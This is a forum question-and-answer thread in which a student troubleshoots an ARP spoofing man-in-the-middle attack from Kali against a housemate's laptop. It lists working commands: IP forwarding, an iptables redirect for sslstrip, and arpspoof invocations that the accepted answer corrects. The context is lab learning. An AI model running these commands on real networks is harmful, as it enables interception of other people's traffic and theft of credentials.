Arp Spoofing Causing Dropped Connections

Question

I have had a lecture today based on Arp Spoofing. However, i can not get it to work.

Scenario:

My laptop - running kali

Target laptop (housemate - with permission) - running windows 8

Commands entered in order:

1. echo 1 > /proc/sys/net/ipv4/ip_forward
2. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1024
3. arpspoof -i wlan0 -t 192.168.0.1 192.168.0.9
4. arpspoof -i wlan0 -t 192.168.0.9 192.168.0.1

However, on completion of these commands, the connection on the targets machine is lost and they cannot access any webpages.

After trying to figure this out myself, i ran Wireshark and noticed that the connection goes as follows:

Target > host > website > host - STOPS HERE.

I am struggling to understand why the traffic is not being forwarded back to the target when i have enabled it?

I have tried to enable a listening program on the port (sslstrip) to see if that was the issue but this causes the same problem.

EDIT: Commands 3 and 4 were perfomed in seperate terminals

Answer 1

I have since figured this out.

Arpspoof has changed to version 2.4 since the tutorials i was reading were written.

I removed the IPTABLES entry.

I changed command 3 and 4 to the following:

1. arpspoof -i wlan0 -t 192.168.0.9 -r 192.168.0.1
2. arpspoof -i wlan0 -t 192.168.0.1 192.168.0.9

(Note the change in order and addition of the -r flag)

Answer 2

If you are running Linux in VirtualBox then you should enable forwarding in the host machine too, because the victim takes the MAC address of the host machine. If you haven't enabled forwarding in the host machine, you might not forward the packet and it might cause a DOS attack.